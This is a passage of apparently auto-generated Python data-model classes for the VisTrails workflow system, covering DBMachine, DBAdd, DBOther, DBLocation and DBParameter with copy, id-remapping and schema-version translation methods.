id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_vistrail_id') and ('vistrail', self._db_vistrail_id) in id_remap:
cp._db_vistrail_id = id_remap[('vistrail', self._db_vistrail_id)]
# recreate indices and set flags
cp.db_workflow_execs_id_index = dict((v.db_id, v) for v in cp._db_workflow_execs)
cp.db_machines_id_index = dict((v.db_id, v) for v in cp._db_machines)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
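# Copy protocol note: with new_ids=True, do_copy draws a fresh id from
# id_scope and records (old_type, old_id) -> new_id in id_remap, so that
# cross-references such as vistrail_id above can be rewritten once the
# referenced object has also been remapped.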
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBLog()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'entity_type' in class_dict:
res = class_dict['entity_type'](old_obj, trans_dict)
new_obj.db_entity_type = res
elif hasattr(old_obj, 'db_entity_type') and old_obj.db_entity_type is not None:
new_obj.db_entity_type = old_obj.db_entity_type
if 'version' in class_dict:
res = class_dict['version'](old_obj, trans_dict)
new_obj.db_version = res
elif hasattr(old_obj, 'db_version') and old_obj.db_version is not None:
new_obj.db_version = old_obj.db_version
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'last_modified' in class_dict:
res = class_dict['last_modified'](old_obj, trans_dict)
new_obj.db_last_modified = res
elif hasattr(old_obj, 'db_last_modified') and old_obj.db_last_modified is not None:
new_obj.db_last_modified = old_obj.db_last_modified
if 'workflow_execs' in class_dict:
res = class_dict['workflow_execs'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_workflow_exec(obj)
elif hasattr(old_obj, 'db_workflow_execs') and old_obj.db_workflow_execs is not None:
for obj in old_obj.db_workflow_execs:
new_obj.db_add_workflow_exec(DBWorkflowExec.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_workflow_execs') and hasattr(new_obj, 'db_deleted_workflow_execs'):
for obj in old_obj.db_deleted_workflow_execs:
n_obj = DBWorkflowExec.update_version(obj, trans_dict)
new_obj.db_deleted_workflow_execs.append(n_obj)
if 'machines' in class_dict:
res = class_dict['machines'](old_obj, trans_dict)
for obj in res:
new_obj.db_add_machine(obj)
elif hasattr(old_obj, 'db_machines') and old_obj.db_machines is not None:
for obj in old_obj.db_machines:
new_obj.db_add_machine(DBMachine.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_machines') and hasattr(new_obj, 'db_deleted_machines'):
for obj in old_obj.db_deleted_machines:
n_obj = DBMachine.update_version(obj, trans_dict)
new_obj.db_deleted_machines.append(n_obj)
if 'vistrail_id' in class_dict:
res = class_dict['vistrail_id'](old_obj, trans_dict)
new_obj.db_vistrail_id = res
elif hasattr(old_obj, 'db_vistrail_id') and old_obj.db_vistrail_id is not None:
new_obj.db_vistrail_id = old_obj.db_vistrail_id
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
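# update_version translates an object across schema versions: each field
# is produced by a translator from trans_dict when one is registered for
# it, and is otherwise copied (or recursively updated, for child objects)
# from old_obj unchanged.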
def db_children(self, parent=(None,None), orphan=False):
children = []
to_del = []
for child in self.db_workflow_execs:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_workflow_exec(child)
to_del = []
for child in self.db_machines:
children.extend(child.db_children((self.vtType, self.db_id), orphan))
if orphan:
to_del.append(child)
for child in to_del:
self.db_delete_machine(child)
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_workflow_execs)
children.extend(self.db_deleted_machines)
if remove:
self.db_deleted_workflow_execs = []
self.db_deleted_machines = []
return children
def has_changes(self):
if self.is_dirty:
return True
for child in self._db_workflow_execs:
if child.has_changes():
return True
for child in self._db_machines:
if child.has_changes():
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_entity_type(self):
return self._db_entity_type
def __set_db_entity_type(self, entity_type):
self._db_entity_type = entity_type
self.is_dirty = True
db_entity_type = property(__get_db_entity_type, __set_db_entity_type)
def db_add_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_change_entity_type(self, entity_type):
self._db_entity_type = entity_type
def db_delete_entity_type(self, entity_type):
self._db_entity_type = None
def __get_db_version(self):
return self._db_version
def __set_db_version(self, version):
self._db_version = version
self.is_dirty = True
db_version = property(__get_db_version, __set_db_version)
def db_add_version(self, version):
self._db_version = version
def db_change_version(self, version):
self._db_version = version
def db_delete_version(self, version):
self._db_version = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_last_modified(self):
return self._db_last_modified
def __set_db_last_modified(self, last_modified):
self._db_last_modified = last_modified
self.is_dirty = True
db_last_modified = property(__get_db_last_modified, __set_db_last_modified)
def db_add_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_change_last_modified(self, last_modified):
self._db_last_modified = last_modified
def db_delete_last_modified(self, last_modified):
self._db_last_modified = None
def __get_db_workflow_execs(self):
return self._db_workflow_execs
def __set_db_workflow_execs(self, workflow_execs):
self._db_workflow_execs = workflow_execs
self.is_dirty = True
db_workflow_execs = property(__get_db_workflow_execs, __set_db_workflow_execs)
def db_get_workflow_execs(self):
return self._db_workflow_execs
def db_add_workflow_exec(self, workflow_exec):
self.is_dirty = True
self._db_workflow_execs.append(workflow_exec)
self.db_workflow_execs_id_index[workflow_exec.db_id] = workflow_exec
def db_change_workflow_exec(self, workflow_exec):
self.is_dirty = True
found = False
for i in xrange(len(self._db_workflow_execs)):
if self._db_workflow_execs[i].db_id == workflow_exec.db_id:
self._db_workflow_execs[i] = workflow_exec
found = True
break
if not found:
self._db_workflow_execs.append(workflow_exec)
self.db_workflow_execs_id_index[workflow_exec.db_id] = workflow_exec
def db_delete_workflow_exec(self, workflow_exec):
self.is_dirty = True
for i in xrange(len(self._db_workflow_execs)):
if self._db_workflow_execs[i].db_id == workflow_exec.db_id:
if not self._db_workflow_execs[i].is_new:
self.db_deleted_workflow_execs.append(self._db_workflow_execs[i])
del self._db_workflow_execs[i]
break
del self.db_workflow_execs_id_index[workflow_exec.db_id]
def db_get_workflow_exec(self, key):
for i in xrange(len(self._db_workflow_execs)):
if self._db_workflow_execs[i].db_id == key:
return self._db_workflow_execs[i]
return None
def db_get_workflow_exec_by_id(self, key):
return self.db_workflow_execs_id_index[key]
def db_has_workflow_exec_with_id(self, key):
return key in self.db_workflow_execs_id_index
def __get_db_machines(self):
return self._db_machines
def __set_db_machines(self, machines):
self._db_machines = machines
self.is_dirty = True
db_machines = property(__get_db_machines, __set_db_machines)
def db_get_machines(self):
return self._db_machines
def db_add_machine(self, machine):
self.is_dirty = True
self._db_machines.append(machine)
self.db_machines_id_index[machine.db_id] = machine
def db_change_machine(self, machine):
self.is_dirty = True
found = False
for i in xrange(len(self._db_machines)):
if self._db_machines[i].db_id == machine.db_id:
self._db_machines[i] = machine
found = True
break
if not found:
self._db_machines.append(machine)
self.db_machines_id_index[machine.db_id] = machine
def db_delete_machine(self, machine):
self.is_dirty = True
for i in xrange(len(self._db_machines)):
if self._db_machines[i].db_id == machine.db_id:
if not self._db_machines[i].is_new:
self.db_deleted_machines.append(self._db_machines[i])
del self._db_machines[i]
break
del self.db_machines_id_index[machine.db_id]
def db_get_machine(self, key):
for i in xrange(len(self._db_machines)):
if self._db_machines[i].db_id == key:
return self._db_machines[i]
return None
def db_get_machine_by_id(self, key):
return self.db_machines_id_index[key]
def db_has_machine_with_id(self, key):
return key in self.db_machines_id_index
def __get_db_vistrail_id(self):
return self._db_vistrail_id
def __set_db_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
self.is_dirty = True
db_vistrail_id = property(__get_db_vistrail_id, __set_db_vistrail_id)
def db_add_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
def db_change_vistrail_id(self, vistrail_id):
self._db_vistrail_id = vistrail_id
def db_delete_vistrail_id(self, vistrail_id):
self._db_vistrail_id = None
def getPrimaryKey(self):
return self._db_id
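# DBMachine is a leaf record describing the host a workflow executed on;
# it has no child collections, so db_children and db_deleted_children
# below reduce to the trivial cases.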
class DBMachine(object):
vtType = 'machine'
def __init__(self, id=None, name=None, os=None, architecture=None, processor=None, ram=None):
self._db_id = id
self._db_name = name
self._db_os = os
self._db_architecture = architecture
self._db_processor = processor
self._db_ram = ram
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBMachine.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBMachine(id=self._db_id,
name=self._db_name,
os=self._db_os,
architecture=self._db_architecture,
processor=self._db_processor,
ram=self._db_ram)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
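# The db_vistrailId guard below is a no-op for DBMachine as defined here:
# no such attribute exists, so hasattr returns False and the remap is
# never taken. It appears to be a leftover from an earlier schema and is
# kept as generated.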
if hasattr(self, 'db_vistrailId') and ('vistrail', self._db_vistrailId) in id_remap:
cp._db_vistrailId = id_remap[('vistrail', self._db_vistrailId)]
# set flags (no indices to recreate here)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBMachine()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'os' in class_dict:
res = class_dict['os'](old_obj, trans_dict)
new_obj.db_os = res
elif hasattr(old_obj, 'db_os') and old_obj.db_os is not None:
new_obj.db_os = old_obj.db_os
if 'architecture' in class_dict:
res = class_dict['architecture'](old_obj, trans_dict)
new_obj.db_architecture = res
elif hasattr(old_obj, 'db_architecture') and old_obj.db_architecture is not None:
new_obj.db_architecture = old_obj.db_architecture
if 'processor' in class_dict:
res = class_dict['processor'](old_obj, trans_dict)
new_obj.db_processor = res
elif hasattr(old_obj, 'db_processor') and old_obj.db_processor is not None:
new_obj.db_processor = old_obj.db_processor
if 'ram' in class_dict:
res = class_dict['ram'](old_obj, trans_dict)
new_obj.db_ram = res
elif hasattr(old_obj, 'db_ram') and old_obj.db_ram is not None:
new_obj.db_ram = old_obj.db_ram
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_name(self):
return self._db_name
def __set_db_name(self, name):
self._db_name = name
self.is_dirty = True
db_name = property(__get_db_name, __set_db_name)
def db_add_name(self, name):
self._db_name = name
def db_change_name(self, name):
self._db_name = name
def db_delete_name(self, name):
self._db_name = None
def __get_db_os(self):
return self._db_os
def __set_db_os(self, os):
self._db_os = os
self.is_dirty = True
db_os = property(__get_db_os, __set_db_os)
def db_add_os(self, os):
self._db_os = os
def db_change_os(self, os):
self._db_os = os
def db_delete_os(self, os):
self._db_os = None
def __get_db_architecture(self):
return self._db_architecture
def __set_db_architecture(self, architecture):
self._db_architecture = architecture
self.is_dirty = True
db_architecture = property(__get_db_architecture, __set_db_architecture)
def db_add_architecture(self, architecture):
self._db_architecture = architecture
def db_change_architecture(self, architecture):
self._db_architecture = architecture
def db_delete_architecture(self, architecture):
self._db_architecture = None
def __get_db_processor(self):
return self._db_processor
def __set_db_processor(self, processor):
self._db_processor = processor
self.is_dirty = True
db_processor = property(__get_db_processor, __set_db_processor)
def db_add_processor(self, processor):
self._db_processor = processor
def db_change_processor(self, processor):
self._db_processor = processor
def db_delete_processor(self, processor):
self._db_processor = None
def __get_db_ram(self):
return self._db_ram
def __set_db_ram(self, ram):
self._db_ram = ram
self.is_dirty = True
db_ram = property(__get_db_ram, __set_db_ram)
def db_add_ram(self, ram):
self._db_ram = ram
def db_change_ram(self, ram):
self._db_ram = ram
def db_delete_ram(self, ram):
self._db_ram = None
def getPrimaryKey(self):
return self._db_id
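# DBAdd models an 'add' action in the version tree's change log: db_data
# holds the payload object being added (module, connection, annotation,
# and so on), while (what, objectId) and (parentObjType, parentObjId)
# locate the addition in the target workflow.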
class DBAdd(object):
vtType = 'add'
def __init__(self, data=None, id=None, what=None, objectId=None, parentObjId=None, parentObjType=None):
self.db_deleted_data = []
self._db_data = data
self._db_id = id
self._db_what = what
self._db_objectId = objectId
self._db_parentObjId = parentObjId
self._db_parentObjType = parentObjType
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBAdd.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBAdd(id=self._db_id,
what=self._db_what,
objectId=self._db_objectId,
parentObjId=self._db_parentObjId,
parentObjType=self._db_parentObjType)
if self._db_data is not None:
cp._db_data = self._db_data.do_copy(new_ids, id_scope, id_remap)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
if hasattr(self, 'db_objectId') and (self._db_what, self._db_objectId) in id_remap:
cp._db_objectId = id_remap[(self._db_what, self._db_objectId)]
if hasattr(self, 'db_parentObjId') and (self._db_parentObjType, self._db_parentObjId) in id_remap:
cp._db_parentObjId = id_remap[(self._db_parentObjType, self._db_parentObjId)]
# set flags (no indices to recreate here)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBAdd()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'data' in class_dict:
res = class_dict['data'](old_obj, trans_dict)
new_obj.db_data = res
elif hasattr(old_obj, 'db_data') and old_obj.db_data is not None:
obj = old_obj.db_data
if obj.vtType == 'module':
new_obj.db_add_data(DBModule.update_version(obj, trans_dict))
elif obj.vtType == 'location':
new_obj.db_add_data(DBLocation.update_version(obj, trans_dict))
elif obj.vtType == 'annotation':
new_obj.db_add_data(DBAnnotation.update_version(obj, trans_dict))
elif obj.vtType == 'function':
new_obj.db_add_data(DBFunction.update_version(obj, trans_dict))
elif obj.vtType == 'connection':
new_obj.db_add_data(DBConnection.update_version(obj, trans_dict))
elif obj.vtType == 'port':
new_obj.db_add_data(DBPort.update_version(obj, trans_dict))
elif obj.vtType == 'parameter':
new_obj.db_add_data(DBParameter.update_version(obj, trans_dict))
elif obj.vtType == 'portSpec':
new_obj.db_add_data(DBPortSpec.update_version(obj, trans_dict))
elif obj.vtType == 'abstraction':
new_obj.db_add_data(DBAbstraction.update_version(obj, trans_dict))
elif obj.vtType == 'group':
new_obj.db_add_data(DBGroup.update_version(obj, trans_dict))
elif obj.vtType == 'other':
new_obj.db_add_data(DBOther.update_version(obj, trans_dict))
elif obj.vtType == 'plugin_data':
new_obj.db_add_data(DBPluginData.update_version(obj, trans_dict))
if hasattr(old_obj, 'db_deleted_data') and hasattr(new_obj, 'db_deleted_data'):
for obj in old_obj.db_deleted_data:
if obj.vtType == 'module':
n_obj = DBModule.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'location':
n_obj = DBLocation.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'annotation':
n_obj = DBAnnotation.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'function':
n_obj = DBFunction.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'connection':
n_obj = DBConnection.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'port':
n_obj = DBPort.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'parameter':
n_obj = DBParameter.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'portSpec':
n_obj = DBPortSpec.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'abstraction':
n_obj = DBAbstraction.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'group':
n_obj = DBGroup.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'other':
n_obj = DBOther.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
elif obj.vtType == 'plugin_data':
n_obj = DBPluginData.update_version(obj, trans_dict)
new_obj.db_deleted_data.append(n_obj)
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'what' in class_dict:
res = class_dict['what'](old_obj, trans_dict)
new_obj.db_what = res
elif hasattr(old_obj, 'db_what') and old_obj.db_what is not None:
new_obj.db_what = old_obj.db_what
if 'objectId' in class_dict:
res = class_dict['objectId'](old_obj, trans_dict)
new_obj.db_objectId = res
elif hasattr(old_obj, 'db_objectId') and old_obj.db_objectId is not None:
new_obj.db_objectId = old_obj.db_objectId
if 'parentObjId' in class_dict:
res = class_dict['parentObjId'](old_obj, trans_dict)
new_obj.db_parentObjId = res
elif hasattr(old_obj, 'db_parentObjId') and old_obj.db_parentObjId is not None:
new_obj.db_parentObjId = old_obj.db_parentObjId
if 'parentObjType' in class_dict:
res = class_dict['parentObjType'](old_obj, trans_dict)
new_obj.db_parentObjType = res
elif hasattr(old_obj, 'db_parentObjType') and old_obj.db_parentObjType is not None:
new_obj.db_parentObjType = old_obj.db_parentObjType
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
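# db_children flattens the subtree into (object, parent_type, parent_id)
# tuples; with orphan=True each child link is severed as it is collected,
# which the persistence layer presumably relies on when re-parenting
# records.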
def db_children(self, parent=(None,None), orphan=False):
children = []
if self._db_data is not None:
children.extend(self._db_data.db_children((self.vtType, self.db_id), orphan))
if orphan:
self._db_data = None
children.append((self, parent[0], parent[1]))
return children
def db_deleted_children(self, remove=False):
children = []
children.extend(self.db_deleted_data)
if remove:
self.db_deleted_data = []
return children
def has_changes(self):
if self.is_dirty:
return True
if self._db_data is not None and self._db_data.has_changes():
return True
return False
def __get_db_data(self):
return self._db_data
def __set_db_data(self, data):
self._db_data = data
self.is_dirty = True
db_data = property(__get_db_data, __set_db_data)
def db_add_data(self, data):
self._db_data = data
def db_change_data(self, data):
self._db_data = data
def db_delete_data(self, data):
if not self.is_new:
self.db_deleted_data.append(self._db_data)
self._db_data = None
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_what(self):
return self._db_what
def __set_db_what(self, what):
self._db_what = what
self.is_dirty = True
db_what = property(__get_db_what, __set_db_what)
def db_add_what(self, what):
self._db_what = what
def db_change_what(self, what):
self._db_what = what
def db_delete_what(self, what):
self._db_what = None
def __get_db_objectId(self):
return self._db_objectId
def __set_db_objectId(self, objectId):
self._db_objectId = objectId
self.is_dirty = True
db_objectId = property(__get_db_objectId, __set_db_objectId)
def db_add_objectId(self, objectId):
self._db_objectId = objectId
def db_change_objectId(self, objectId):
self._db_objectId = objectId
def db_delete_objectId(self, objectId):
self._db_objectId = None
def __get_db_parentObjId(self):
return self._db_parentObjId
def __set_db_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
self.is_dirty = True
db_parentObjId = property(__get_db_parentObjId, __set_db_parentObjId)
def db_add_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_change_parentObjId(self, parentObjId):
self._db_parentObjId = parentObjId
def db_delete_parentObjId(self, parentObjId):
self._db_parentObjId = None
def __get_db_parentObjType(self):
return self._db_parentObjType
def __set_db_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
self.is_dirty = True
db_parentObjType = property(__get_db_parentObjType, __set_db_parentObjType)
def db_add_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_change_parentObjType(self, parentObjType):
self._db_parentObjType = parentObjType
def db_delete_parentObjType(self, parentObjType):
self._db_parentObjType = None
def getPrimaryKey(self):
return self._db_id
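# DBOther appears to be a generic key/value escape hatch for fields that
# have no dedicated slot of their own.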
class DBOther(object):
vtType = 'other'
def __init__(self, id=None, key=None, value=None):
self._db_id = id
self._db_key = key
self._db_value = value
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBOther.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBOther(id=self._db_id,
key=self._db_key,
value=self._db_value)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# set flags (no indices to recreate here)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBOther()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'key' in class_dict:
res = class_dict['key'](old_obj, trans_dict)
new_obj.db_key = res
elif hasattr(old_obj, 'db_key') and old_obj.db_key is not None:
new_obj.db_key = old_obj.db_key
if 'value' in class_dict:
res = class_dict['value'](old_obj, trans_dict)
new_obj.db_value = res
elif hasattr(old_obj, 'db_value') and old_obj.db_value is not None:
new_obj.db_value = old_obj.db_value
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_key(self):
return self._db_key
def __set_db_key(self, key):
self._db_key = key
self.is_dirty = True
db_key = property(__get_db_key, __set_db_key)
def db_add_key(self, key):
self._db_key = key
def db_change_key(self, key):
self._db_key = key
def db_delete_key(self, key):
self._db_key = None
def __get_db_value(self):
return self._db_value
def __set_db_value(self, value):
self._db_value = value
self.is_dirty = True
db_value = property(__get_db_value, __set_db_value)
def db_add_value(self, value):
self._db_value = value
def db_change_value(self, value):
self._db_value = value
def db_delete_value(self, value):
self._db_value = None
def getPrimaryKey(self):
return self._db_id
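# DBLocation stores a module's (x, y) canvas position; it is held as a
# single child rather than a collection, hence the scalar _db_location
# slots on the owning classes.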
class DBLocation(object):
vtType = 'location'
def __init__(self, id=None, x=None, y=None):
self._db_id = id
self._db_x = x
self._db_y = y
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBLocation.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBLocation(id=self._db_id,
x=self._db_x,
y=self._db_y)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# set flags (no indices to recreate here)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBLocation()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'x' in class_dict:
res = class_dict['x'](old_obj, trans_dict)
new_obj.db_x = res
elif hasattr(old_obj, 'db_x') and old_obj.db_x is not None:
new_obj.db_x = old_obj.db_x
if 'y' in class_dict:
res = class_dict['y'](old_obj, trans_dict)
new_obj.db_y = res
elif hasattr(old_obj, 'db_y') and old_obj.db_y is not None:
new_obj.db_y = old_obj.db_y
new_obj.is_new = old_obj.is_new
new_obj.is_dirty = old_obj.is_dirty
return new_obj
def db_children(self, parent=(None,None), orphan=False):
return [(self, parent[0], parent[1])]
def db_deleted_children(self, remove=False):
children = []
return children
def has_changes(self):
if self.is_dirty:
return True
return False
def __get_db_id(self):
return self._db_id
def __set_db_id(self, id):
self._db_id = id
self.is_dirty = True
db_id = property(__get_db_id, __set_db_id)
def db_add_id(self, id):
self._db_id = id
def db_change_id(self, id):
self._db_id = id
def db_delete_id(self, id):
self._db_id = None
def __get_db_x(self):
return self._db_x
def __set_db_x(self, x):
self._db_x = x
self.is_dirty = True
db_x = property(__get_db_x, __set_db_x)
def db_add_x(self, x):
self._db_x = x
def db_change_x(self, x):
self._db_x = x
def db_delete_x(self, x):
self._db_x = None
def __get_db_y(self):
return self._db_y
def __set_db_y(self, y):
self._db_y = y
self.is_dirty = True
db_y = property(__get_db_y, __set_db_y)
def db_add_y(self, y):
self._db_y = y
def db_change_y(self, y):
self._db_y = y
def db_delete_y(self, y):
self._db_y = None
def getPrimaryKey(self):
return self._db_id
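# DBParameter is one argument of a DBFunction: pos orders it within the
# function, type and val carry the typed value, and alias is an optional
# user-visible name. A hypothetical instance:
#
#     p = DBParameter(id=4, pos=0, type='String', val='x')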
class DBParameter(object):
vtType = 'parameter'
def __init__(self, id=None, pos=None, name=None, type=None, val=None, alias=None):
self._db_id = id
self._db_pos = pos
self._db_name = name
self._db_type = type
self._db_val = val
self._db_alias = alias
self.is_dirty = True
self.is_new = True
def __copy__(self):
return DBParameter.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBParameter(id=self._db_id,
pos=self._db_pos,
name=self._db_name,
type=self._db_type,
val=self._db_val,
alias=self._db_alias)
# set new ids
if new_ids:
new_id = id_scope.getNewId(self.vtType)
if self.vtType in id_scope.remap:
id_remap[(id_scope.remap[self.vtType], self.db_id)] = new_id
else:
id_remap[(self.vtType, self.db_id)] = new_id
cp.db_id = new_id
# set flags (no indices to recreate here)
if not new_ids:
cp.is_dirty = self.is_dirty
cp.is_new = self.is_new
return cp
@staticmethod
def update_version(old_obj, trans_dict, new_obj=None):
if new_obj is None:
new_obj = DBParameter()
class_dict = {}
if new_obj.__class__.__name__ in trans_dict:
class_dict = trans_dict[new_obj.__class__.__name__]
if 'id' in class_dict:
res = class_dict['id'](old_obj, trans_dict)
new_obj.db_id = res
elif hasattr(old_obj, 'db_id') and old_obj.db_id is not None:
new_obj.db_id = old_obj.db_id
if 'pos' in class_dict:
res = class_dict['pos'](old_obj, trans_dict)
new_obj.db_pos = res
elif hasattr(old_obj, 'db_pos') and old_obj.db_pos is not None:
new_obj.db_pos = old_obj.db_pos
if 'name' in class_dict:
res = class_dict['name'](old_obj, trans_dict)
new_obj.db_name = res
elif hasattr(old_obj, 'db_name') and old_obj.db_name is not None:
new_obj.db_name = old_obj.db_name
if 'type' in class_dict:
res = class_dict['type'](old_obj, trans_dict)
new_obj.db_type = res
elif hasattr(old_obj, 'db_type') and old_obj.db_type is not None:
new_obj.db_type = old_obj.db_type
if 'val' in class_dict:
res = class_dict['val'](old_obj, trans_dict)
new_obj.db_val = res
elif hasattr(old_obj, 'db_val') and old_obj.db_val is not None:
new_obj.db_val = old_obj.db_val
if 'alias' in class_dict:
res = class_dict['alias'](old_obj, trans_dict)
new_obj.db_alias = res
elif hasattr(old_obj, 'db_alias') and old_obj.db_alias is not None:
new_obj.db_alias = old_obj.db_alias
